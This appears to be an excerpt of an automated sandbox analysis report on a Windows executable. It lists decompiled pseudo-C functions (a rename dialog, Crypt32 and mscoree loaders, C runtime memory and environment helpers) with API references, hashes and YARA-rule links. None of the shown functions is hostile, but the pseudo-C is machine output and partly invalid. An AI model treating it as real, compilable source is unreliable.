                                            • Instruction Fuzzy Hash: 48F0A93D54460067E72137357C0AF2E12598BD1763BB50214FD25B3192FE708BCD656C
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C4C2A7, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 83%
                                            			E00C4C2A7(void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
				void* _t12;
				WCHAR* _t16;
				void* _t17;
				struct HWND__* _t18;
				intOrPtr _t19;
				void* _t20;
				signed short _t23;

				_t16 = _a16;
				_t23 = _a12;
				_t19 = _a8;
				_t18 = _a4;
				if(E00C312D7(_t17, _t18, _t19, _t23, _t16, L"RENAMEDLG", 0, 0) != 0) {
					L10:
					return 1;
				}
				_t20 = _t19 - 0x110;
				if(_t20 == 0) {
					 *0xc8de34 = _t16;
					SetDlgItemTextW(_t18, 0x66, _t16);
					SetDlgItemTextW(_t18, 0x68,  *0xc8de34);
					goto L10;
				}
				if(_t20 != 1) {
					L5:
					return 0;
				}
				_t12 = (_t23 & 0x0000ffff) - 1;
				if(_t12 == 0) {
					GetDlgItemTextW(_t18, 0x68,  *0xc8de34, 0x800);
					_push(1);
					L7:
					EndDialog(_t18, ??);
					goto L10;
				}
				if(_t12 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}










                                            0x00c4c2a8
                                            0x00c4c2ad
                                            0x00c4c2b2
                                            0x00c4c2b7
                                            0x00c4c2cf
                                            0x00c4c32f
                                            0x00000000
                                            0x00c4c331
                                            0x00c4c2d1
                                            0x00c4c2d7
                                            0x00c4c31c
                                            0x00c4c322
                                            0x00c4c32d
                                            0x00000000
                                            0x00c4c32d
                                            0x00c4c2dc
                                            0x00c4c2eb
                                            0x00000000
                                            0x00c4c2eb
                                            0x00c4c2e1
                                            0x00c4c2e4
                                            0x00c4c308
                                            0x00c4c30e
                                            0x00c4c2f1
                                            0x00c4c2f2
                                            0x00000000
                                            0x00c4c2f2
                                            0x00c4c2e9
                                            0x00c4c2ef
                                            0x00000000
                                            0x00c4c2ef
                                            0x00000000

                                            APIs
                                              • Part of subcall function 00C312D7: GetDlgItem.USER32(00000000,00003021), ref: 00C3131B
                                              • Part of subcall function 00C312D7: SetWindowTextW.USER32(00000000,00C622E4), ref: 00C31331
                                            • EndDialog.USER32(?,00000001), ref: 00C4C2F2
                                            • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00C4C308
                                            • SetDlgItemTextW.USER32(?,00000066,?), ref: 00C4C322
                                            • SetDlgItemTextW.USER32(?,00000068), ref: 00C4C32D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ItemText$DialogWindow
                                            • String ID: RENAMEDLG
                                            • API String ID: 445417207-3299779563
                                            • Opcode ID: 2b2ab8fb4cde2fe04331950d95c90f7918ebfdbe8afe4934d8e0c548fba00739
                                            • Instruction ID: 5c178c8c1421b853120efe76349ce027f7419cace49d0c93ab04337b7a9a3f6d
                                            • Opcode Fuzzy Hash: 2b2ab8fb4cde2fe04331950d95c90f7918ebfdbe8afe4934d8e0c548fba00739
                                            • Instruction Fuzzy Hash: C8012832A422147AD2605EA65DC4F7B7B6CF75AB00F004015F302B70F0C6E2AD009775
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C56B78, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 37%
                                            			E00C56B78(void* __ecx, void* __esi, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _t10;
				intOrPtr* _t20;
				signed int _t22;

				_t10 =  *0xc6d668; // 0x13bcba52
				_v8 = _t10 ^ _t22;
				_v12 = _v12 & 0x00000000;
				_t12 =  &_v12;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
				if(_t12 != 0) {
					_t20 = GetProcAddress(_v12, "CorExitProcess");
					if(_t20 != 0) {
						 *0xc62260(_a4);
						_t12 =  *_t20();
					}
				}
				if(_v12 != 0) {
					_t12 = FreeLibrary(_v12);
				}
				return E00C4E203(_t12, _v8 ^ _t22);
			}








                                            0x00c56b7f
                                            0x00c56b86
                                            0x00c56b89
                                            0x00c56b8d
                                            0x00c56b98
                                            0x00c56ba0
                                            0x00c56bb1
                                            0x00c56bb5
                                            0x00c56bbc
                                            0x00c56bc2
                                            0x00c56bc2
                                            0x00c56bc4
                                            0x00c56bc9
                                            0x00c56bce
                                            0x00c56bce
                                            0x00c56be1

                                            APIs
                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00C56B29,00000003,?,00C56AC9,00000003,00C6A800,0000000C,00C56C20,00000003,00000002), ref: 00C56B98
                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C56BAB
                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00C56B29,00000003,?,00C56AC9,00000003,00C6A800,0000000C,00C56C20,00000003,00000002,00000000), ref: 00C56BCE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AddressFreeHandleLibraryModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 4061214504-1276376045
                                            • Opcode ID: b338758f0f385c001f5fef18577337fb0fc5da147d9933ed3a9ddf8482df9457
                                            • Instruction ID: d3fa4bc3b34d0977b474b4f06fde602d35b52ac86de8c0749b975a8b4aceb7f7
                                            • Opcode Fuzzy Hash: b338758f0f385c001f5fef18577337fb0fc5da147d9933ed3a9ddf8482df9457
                                            • Instruction Fuzzy Hash: 08F0A431A00209BBCB255B91DC09F9EBFB8EB04715F000164F805E2190DBB44F84DB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C3E7E3, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00C3E7E3(struct HINSTANCE__** __ecx) {
				void* _t5;
				struct HINSTANCE__* _t6;
				struct HINSTANCE__** _t9;

				_t9 = __ecx;
				if(__ecx[1] == 0) {
					_t6 = E00C3FCFD(L"Crypt32.dll");
					 *__ecx = _t6;
					if(_t6 != 0) {
						_t9[2] = GetProcAddress(_t6, "CryptProtectMemory");
						_t6 = GetProcAddress( *_t9, "CryptUnprotectMemory");
						_t9[3] = _t6;
					}
					_t9[1] = 1;
					return _t6;
				}
				return _t5;
			}






                                            0x00c3e7e4
                                            0x00c3e7ea
                                            0x00c3e7f1
                                            0x00c3e7f6
                                            0x00c3e7fa
                                            0x00c3e80f
                                            0x00c3e812
                                            0x00c3e818
                                            0x00c3e818
                                            0x00c3e81b
                                            0x00000000
                                            0x00c3e81b
                                            0x00c3e820

                                            APIs
                                              • Part of subcall function 00C3FCFD: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00C3FD18
                                              • Part of subcall function 00C3FCFD: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00C3E7F6,Crypt32.dll,?,00C3E878,?,00C3E85C,?,?,?,?), ref: 00C3FD3A
                                            • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00C3E802
                                            • GetProcAddress.KERNEL32(00C77350,CryptUnprotectMemory), ref: 00C3E812
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AddressProc$DirectoryLibraryLoadSystem
                                            • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                            • API String ID: 2141747552-1753850145
                                            • Opcode ID: a7f11b51301e141d158d03539665a3e33a607c42c1d232461c9851a095ed68dc
                                            • Instruction ID: 364a5bcd35552372a6d2d155b6714017d5c3077c35f82cca32d77fc90c16b0f3
                                            • Opcode Fuzzy Hash: a7f11b51301e141d158d03539665a3e33a607c42c1d232461c9851a095ed68dc
                                            • Instruction Fuzzy Hash: C4E04FB0950F43AADB205B39D848705FBA4AF10700F10C535F424D31D1DBF4D051CB60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C57389, Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 83%
                                            			E00C57389(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t50;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int* _t81;
				signed int _t85;
				void* _t86;

				_t72 = __edx;
				_v12 = __ecx;
				_t28 =  *__ecx;
				_t81 =  *_t28;
				if(_t81 != 0) {
					_t29 =  *0xc6d668; // 0x13bcba52
					_t56 =  *_t81 ^ _t29;
					_t78 = _t81[1] ^ _t29;
					_t83 = _t81[2] ^ _t29;
					asm("ror edi, cl");
					asm("ror esi, cl");
					asm("ror ebx, cl");
					if(_t78 != _t83) {
						L14:
						 *_t78 = E00C569A8( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_t33 = E00C4DB10(_t56);
						_t57 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
						_t24 = _t78 + 4; // 0x4
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E00C4DB10(_t24);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E00C4DB10(_t83);
						_t37 = 0;
						L15:
						return _t37;
					}
					_t38 = 0x200;
					_t85 = _t83 - _t56 >> 2;
					if(_t85 <= 0x200) {
						_t38 = _t85;
					}
					_t80 = _t38 + _t85;
					if(_t80 == 0) {
						_t80 = 0x20;
					}
					if(_t80 < _t85) {
						L9:
						_push(4);
						_t80 = _t85 + 4;
						_push(_t80);
						_v8 = E00C5AC29(_t56);
						_t40 = E00C57A50(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							goto L11;
						}
						_t37 = _t40 | 0xffffffff;
						goto L15;
					} else {
						_push(4);
						_push(_t80);
						_v8 = E00C5AC29(_t56);
						E00C57A50(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							L11:
							_t56 = _t68;
							_v8 = _t68 + _t85 * 4;
							_t83 = _t68 + _t80 * 4;
							_t78 = _v8;
							_push(0x20);
							asm("ror eax, cl");
							_t71 = _t78;
							_v16 = 0 ^  *0xc6d668;
							asm("sbb edx, edx");
							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
							_v8 = _t74;
							if(_t74 == 0) {
								goto L14;
							}
							_t75 = _v16;
							_t50 = 0;
							do {
								_t50 = _t50 + 1;
								 *_t71 = _t75;
								_t71 = _t71 + 4;
							} while (_t50 != _v8);
							goto L14;
						}
						goto L9;
					}
				}
				return _t28 | 0xffffffff;
			}

























                                            0x00c57389
                                            0x00c57393
                                            0x00c57397
                                            0x00c57399
                                            0x00c5739d
                                            0x00c573a7
                                            0x00c573b8
                                            0x00c573bd
                                            0x00c573bf
                                            0x00c573c1
                                            0x00c573c3
                                            0x00c573c5
                                            0x00c573c9
                                            0x00c57483
                                            0x00c57491
                                            0x00c57493
                                            0x00c57498
                                            0x00c5749f
                                            0x00c574a1
                                            0x00c574af
                                            0x00c574be
                                            0x00c574c1
                                            0x00c574c3
                                            0x00000000
                                            0x00c574c4
                                            0x00c573d1
                                            0x00c573d6
                                            0x00c573db
                                            0x00c573dd
                                            0x00c573dd
                                            0x00c573df
                                            0x00c573e4
                                            0x00c573e8
                                            0x00c573e8
                                            0x00c573eb
                                            0x00c5740a
                                            0x00c5740a
                                            0x00c5740c
                                            0x00c5740f
                                            0x00c57418
                                            0x00c5741b
                                            0x00c57420
                                            0x00c57423
                                            0x00c57428
                                            0x00000000
                                            0x00000000
                                            0x00c5742a
                                            0x00000000
                                            0x00c573ed
                                            0x00c573ed
                                            0x00c573ef
                                            0x00c573f8
                                            0x00c573fb
                                            0x00c57400
                                            0x00c57403
                                            0x00c57408
                                            0x00c57432
                                            0x00c57435
                                            0x00c57437
                                            0x00c5743a
                                            0x00c57442
                                            0x00c57448
                                            0x00c5744f
                                            0x00c57451
                                            0x00c57459
                                            0x00c57468
                                            0x00c5746c
                                            0x00c5746e
                                            0x00c57471
                                            0x00000000
                                            0x00000000
                                            0x00c57473
                                            0x00c57476
                                            0x00c57478
                                            0x00c57478
                                            0x00c57479
                                            0x00c5747b
                                            0x00c5747e
                                            0x00000000
                                            0x00c57478
                                            0x00000000
                                            0x00c57408
                                            0x00c573eb
                                            0x00000000

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: _free
                                            • String ID:
                                            • API String ID: 269201875-0
                                            • Opcode ID: 3bea520832a7cb5706fc0fcfc366a36e241646896a37e3a2ada91924cf4a2b3e
                                            • Instruction ID: 511d936dc03a69dd0a915009e9e51de89d36e7cb9fbf4c3b945933363569722f
                                            • Opcode Fuzzy Hash: 3bea520832a7cb5706fc0fcfc366a36e241646896a37e3a2ada91924cf4a2b3e
                                            • Instruction Fuzzy Hash: 9C41F33AB002009FCB20DF78D881A5EB7A6EF89310B154668E915EB391D731EE85DB85
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C5ABA6, Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 93%
                                            			E00C5ABA6() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E00C5AB6F(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t25 = E00C57A8A(_t19, _t7);
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						E00C57A50(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}












                                            0x00c5abb5
                                            0x00c5abbb
                                            0x00c5ac13
                                            0x00c5ac13
                                            0x00c5abbd
                                            0x00c5abbe
                                            0x00c5abc3
                                            0x00c5abcc
                                            0x00c5abd2
                                            0x00c5abd8
                                            0x00c5abdd
                                            0x00000000
                                            0x00c5abdf
                                            0x00c5abe5
                                            0x00c5abea
                                            0x00c5ac08
                                            0x00c5ac02
                                            0x00c5ac02
                                            0x00c5ac04
                                            0x00c5ac04
                                            0x00c5ac0b
                                            0x00c5ac10
                                            0x00c5abdd
                                            0x00c5ac17
                                            0x00c5ac1a
                                            0x00c5ac1a
                                            0x00c5ac28

                                            APIs
                                            • GetEnvironmentStringsW.KERNEL32 ref: 00C5ABAF
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C5ABD2
                                              • Part of subcall function 00C57A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00C52FA6,?,0000015D,?,?,?,?,00C54482,000000FF,00000000,?,?), ref: 00C57ABC
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00C5ABF8
                                            • _free.LIBCMT ref: 00C5AC0B
                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C5AC1A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                            • String ID:
                                            • API String ID: 336800556-0
                                            • Opcode ID: 1815b4cb6231dc93cd91873df75ae6d0470dd52b7a9c197390dfd288a8d322e4
                                            • Instruction ID: 429099d2286619bfb870d13a09ad565dc3a53e93f757fa7f9c3f053e18563319
                                            • Opcode Fuzzy Hash: 1815b4cb6231dc93cd91873df75ae6d0470dd52b7a9c197390dfd288a8d322e4
                                            • Instruction Fuzzy Hash: E80128766066103F233116776C4CE7F7A6CDEC6BA23150318FD04C3200DA629E8591B9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C5859A, Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 82%
                                            			E00C5859A(void* __ecx, void* __edx) {
				void* __esi;
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t16;
				long _t17;

				_t11 = __ecx;
				_t17 = GetLastError();
				_t10 = 0;
				_t2 =  *0xc6d6ac; // 0x6
				_t20 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t16 = E00C57B1B(_t11, 1, 0x364);
					_pop(_t13);
					if(_t16 != 0) {
						_t4 = E00C59BA9(_t13, _t17, __eflags,  *0xc6d6ac, _t16);
						__eflags = _t4;
						if(_t4 != 0) {
							E00C58388(_t13, _t16, 0xc90418);
							E00C57A50(_t10);
							__eflags = _t16;
							if(_t16 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t16);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						E00C57A50();
						L8:
						SetLastError(_t17);
					}
				} else {
					_t16 = E00C59B53(_t11, _t17, _t20, _t2);
					if(_t16 != 0) {
						L9:
						SetLastError(_t17);
						_t10 = _t16;
					} else {
						goto L2;
					}
				}
				return _t10;
			}











                                            0x00c5859a
                                            0x00c585a5
                                            0x00c585a7
                                            0x00c585a9
                                            0x00c585ae
                                            0x00c585b1
                                            0x00c585bf
                                            0x00c585cb
                                            0x00c585ce
                                            0x00c585d1
                                            0x00c585e3
                                            0x00c585e8
                                            0x00c585ea
                                            0x00c585f5
                                            0x00c585fb
                                            0x00c58603
                                            0x00c58605
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c585ec
                                            0x00c585ec
                                            0x00000000
                                            0x00c585ec
                                            0x00c585d3
                                            0x00c585d3
                                            0x00c585d4
                                            0x00c585d4
                                            0x00c58607
                                            0x00c58608
                                            0x00c58608
                                            0x00c585b3
                                            0x00c585b9
                                            0x00c585bd
                                            0x00c58610
                                            0x00c58611
                                            0x00c58617
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c585bd
                                            0x00c5861e

                                            APIs
                                            • GetLastError.KERNEL32(?,?,?,00C57ED1,00C57B6D,?,00C58544,00000001,00000364,?,00C53394,?,?,?,00C52E0F,00000050), ref: 00C5859F
                                            • _free.LIBCMT ref: 00C585D4
                                            • _free.LIBCMT ref: 00C585FB
                                            • SetLastError.KERNEL32(00000000), ref: 00C58608
                                            • SetLastError.KERNEL32(00000000), ref: 00C58611
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ErrorLast$_free
                                            • String ID:
                                            • API String ID: 3170660625-0
                                            • Opcode ID: a3d36715e6939526c3f22167010bbdbdba5a1a06fe88c2155485527bbaec4344
                                            • Instruction ID: 96421777549f0b0e7b5dc6f3b2f0a82d3ee6be0361a2bb96339c57feed9f2ca6
                                            • Opcode Fuzzy Hash: a3d36715e6939526c3f22167010bbdbdba5a1a06fe88c2155485527bbaec4344
                                            • Instruction Fuzzy Hash: 8C01D67E245A006BE72226366C45B2F2659DBD07637250124FC16B2153EE618A8D616D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C403C7, Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 82%
                                            			E00C403C7(void* __ecx) {
				intOrPtr _v16;
				void* __ebp;
				int _t16;
				void** _t21;
				long* _t25;
				void* _t28;
				void* _t30;
				intOrPtr _t31;

				_t22 = __ecx;
				_push(0xffffffff);
				_push(E00C61161);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t31;
				_t28 = __ecx;
				E00C40697(__ecx);
				_t25 = 0;
				 *((char*)(__ecx + 0x314)) = 1;
				ReleaseSemaphore( *(__ecx + 0x318), 0x40, 0);
				if( *((intOrPtr*)(_t28 + 0x104)) > 0) {
					_t21 = _t28 + 4;
					do {
						E00C404BA(_t22, _t30,  *_t21);
						CloseHandle( *_t21);
						_t25 = _t25 + 1;
						_t21 =  &(_t21[1]);
					} while (_t25 <  *((intOrPtr*)(_t28 + 0x104)));
				}
				DeleteCriticalSection(_t28 + 0x320);
				CloseHandle( *(_t28 + 0x318));
				_t16 = CloseHandle( *(_t28 + 0x31c));
				 *[fs:0x0] = _v16;
				return _t16;
			}











                                            0x00c403c7
                                            0x00c403d0
                                            0x00c403d2
                                            0x00c403d7
                                            0x00c403d8
                                            0x00c403e2
                                            0x00c403e4
                                            0x00c403e9
                                            0x00c403eb
                                            0x00c403fb
                                            0x00c40407
                                            0x00c40409
                                            0x00c4040c
                                            0x00c4040e
                                            0x00c40415
                                            0x00c4041b
                                            0x00c4041c
                                            0x00c4041f
                                            0x00c4040c
                                            0x00c4042e
                                            0x00c4043a
                                            0x00c40446
                                            0x00c40451
                                            0x00c4045c

                                            APIs
                                              • Part of subcall function 00C40697: ResetEvent.KERNEL32(?), ref: 00C406A9
                                              • Part of subcall function 00C40697: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00C406BD
                                            • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00C403FB
                                            • CloseHandle.KERNEL32(?,?), ref: 00C40415
                                            • DeleteCriticalSection.KERNEL32(?), ref: 00C4042E
                                            • CloseHandle.KERNEL32(?), ref: 00C4043A
                                            • CloseHandle.KERNEL32(?), ref: 00C40446
                                              • Part of subcall function 00C404BA: WaitForSingleObject.KERNEL32(?,000000FF,00C406CE,?), ref: 00C404C0
                                              • Part of subcall function 00C404BA: GetLastError.KERNEL32(?), ref: 00C404CC
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                            • String ID:
                                            • API String ID: 1868215902-0
                                            • Opcode ID: 28596047e8f2dcde99aff499536d9ed533f01d2335b859c832da594a29832d2a
                                            • Instruction ID: 719ae85ec1bff3d4dcd43431b21efc952210a092f4bb09a91c5387e81a4e4ce0
                                            • Opcode Fuzzy Hash: 28596047e8f2dcde99aff499536d9ed533f01d2335b859c832da594a29832d2a
                                            • Instruction Fuzzy Hash: 3301B172040B04EBC7329B69DC88FCABBF9FB48750F000529F66B921A0CBB56944CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C5B461, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00C5B461(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0xc6dd50; // 0xc6dd44
					if(_t23 != 0) {
						E00C57A50(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0xc6dd54; // 0xc9088c
					if(_t24 != 0) {
						E00C57A50(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0xc6dd58; // 0xc9088c
					if(_t25 != 0) {
						E00C57A50(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0xc6dd80; // 0xc6dd48
					if(_t26 != 0) {
						E00C57A50(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0xc6dd84; // 0xc90890
					if(_t27 != 0) {
						return E00C57A50(_t6);
					}
				}
				return _t6;
			}










                                            0x00c5b467
                                            0x00c5b46c
                                            0x00c5b470
                                            0x00c5b476
                                            0x00c5b479
                                            0x00c5b47e
                                            0x00c5b482
                                            0x00c5b488
                                            0x00c5b48b
                                            0x00c5b490
                                            0x00c5b494
                                            0x00c5b49a
                                            0x00c5b49d
                                            0x00c5b4a2
                                            0x00c5b4a6
                                            0x00c5b4ac
                                            0x00c5b4af
                                            0x00c5b4b4
                                            0x00c5b4b5
                                            0x00c5b4b8
                                            0x00c5b4be
                                            0x00000000
                                            0x00c5b4c6
                                            0x00c5b4be
                                            0x00c5b4c9

                                            APIs
                                            • _free.LIBCMT ref: 00C5B479
                                              • Part of subcall function 00C57A50: RtlFreeHeap.NTDLL(00000000,00000000,?,00C5B4F8,?,00000000,?,00000000,?,00C5B51F,?,00000007,?,?,00C5B91C,?), ref: 00C57A66
                                              • Part of subcall function 00C57A50: GetLastError.KERNEL32(?,?,00C5B4F8,?,00000000,?,00000000,?,00C5B51F,?,00000007,?,?,00C5B91C,?,?), ref: 00C57A78
                                            • _free.LIBCMT ref: 00C5B48B
                                            • _free.LIBCMT ref: 00C5B49D
                                            • _free.LIBCMT ref: 00C5B4AF
                                            • _free.LIBCMT ref: 00C5B4C1
                                            Memory Dump Source
